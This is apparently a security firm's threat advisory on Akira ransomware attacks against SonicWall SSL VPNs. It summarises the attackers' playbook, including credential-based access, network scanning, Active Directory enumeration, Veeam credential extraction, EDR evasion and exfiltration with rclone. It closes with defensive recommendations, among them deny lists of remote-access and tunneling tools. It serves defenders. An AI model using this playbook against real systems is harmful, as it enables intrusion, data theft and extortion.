Akira Ransomware Targets SonicWall VPNs in Lightning-Fast Attacks

Published Date: September 29, 2025
Category: ShadowOpsIntel
Share:

In a rapidly escalating campaign, the Akira ransomware group has launched a series of opportunistic, high-speed intrusions targeting SonicWall SSL VPNs. First observed in late July 2025, these attacks are characterized by their minimal dwell time, often less than one hour, and a consistent playbook of credential-based access, lateral movement, and ransomware deployment. The campaign has impacted organizations across various sectors, with Arctic Wolf Labs confirming active exploitation through September 2025.

Severity: High

Threat Details

1. Targeted Technology

  • SonicWall SSL VPN appliances
  • Models affected: NSa 2600, 2700, 4650, 5700; TZ370, TZ470
  • SonicOS versions impacted: 6.5.5.1 to 7.3.0
  • Linked CVE: CVE-2024-40766 (Improper Access Control)

2. Initial Access

  • Threat actors gain access via SSL VPN logins originating from VPS hosting providers.
  • Use of valid credentials, likely harvested during prior exploitation of CVE-2024-40766.
  • Even accounts with OTP MFA enabled were successfully breached, suggesting compromise of OTP seed material (used to generate valid OTP tokens).

3. Discovery & Lateral Movement

  • Port and Host Scanning:
    • Conducted via SoftPerfect Network Scanner and Advanced IP Scanner.
    • Tools were deployed to compromised Windows hosts in %Temp%, Desktop, Downloads directories.
    • Scanning focused on key services: SMB (445), NetBIOS (137), RPC (135), SQL (1433).
  • SMB-Based Discovery via Impacket:
    • Use of the Python Impacket library was confirmed via SMBv2 session signatures.
    • SMB session setup requests originated from hostnames such as: WINUTIL, kali, DESKTOP-HPLM2TD, WIN-V1L65ED9I55, etc.
    • Event IDs observed: 4624 (successful SMB logon type 3), 4625 (failed SMB logon type 3).
  • Lateral Movement via RDP:
    • Remote Desktop Protocol (RDP) was used for hands-on-keyboard access.
    • Logon events indicated usage of type 10 (remote interactive) sessions.
  • Active directory enumeration executed through built-in tools: nltest, dsquery, and PowerShell cmdlets like Get-ADUser, Get-ADComputer. Outputs were exfiltrated to local text files (e.g., C:\ProgramData\AdUsers.txt).

4. Credential Access & Persistence

  • Backup system access via: Use of custom PowerShell scripts to extract Veeam credentials from MSSQL/PostgreSQL and decrypt secrets.
  • Persistence techniques:
    • Creation of local and domain admin accounts (e.g., sqlbackup, veean) using net.exe
    • Deployment of RMM tools like AnyDesk, TeamViewer, and RustDesk.

5. Defense Evasion

  • Disabled RMM tools (e.g., Splashtop) and Windows Defender via PowerShell.
  • Used BYOVD techniques (e.g., consent.exe + malicious DLL + vulnerable driver).
  • Employed ACL tampering at the kernel level to neutralize EDR processes.
  • Deleted shadow copies and modified UAC registry settings for elevated remote access.
  • Applied geofencing via locale checks to avoid systems in Eastern Europe/Central Asia.

6. Data Staging & Exfiltration

  • Used WinRAR to package data (split archives, filtered by file types and date).
  • Exfiltrated data using rclone and FileZilla to attacker-controlled VPS servers.

7. Ransomware Deployment

  • Ransomware binaries (akira.exe, locker.exe) executed per-drive or via share list.
  • Encryption initiated in under 4 hours post-initial access as short as 55 minutes.

Recommendations

  1. Patch SonicWall devices urgently, especially against CVE-2024-40766.
  2. It is recommended to reset all SSL VPN credentials on SonicWall devices that have ever run firmware vulnerable to CVE-2024-40766, as well as Active Directory credentials on accounts used for SSL VPN access and LDAP synchronization.
  3. Organizations should consider SonicWall’s guidance on the MySonicWall cloud backup file incident and determine on a case-by-case basis if any serial numbers were affected.
  4. Organizations using the MySonicWall cloud backup feature are strongly advised to reset credentials as instructed by SonicWall.
  5. Block EXE/DLL/SYS/MSI/script execution from user-writable directories such as %ProgramData%, %TEMP%, %Users%\Downloads, and %PUBLIC%. Allow only explicitly approved updaters where necessary.
  6. Only permit execution of signed code from approved vendors and product families.
  7. Prevent unsigned or known-vulnerable drivers (e.g., sys, churchill_driver.sys, etc) from loading, even with administrative rights.
  8. Explicitly deny execution of RMM and tunneling utilities (AnyDesk, RustDesk, Cloudflared) unless explicitly sanctioned and allowlisted.
  9. Block the IOCs at their respective controls
    https://www.virustotal.com/gui/collection/b986d6e26ab8c80d1b8ebf6d3e85c14f8854080c5c40a20bcb3daf93c9dd1b06/iocs

Source:

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.

Ampcus Cyber
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.

 Talk to an expert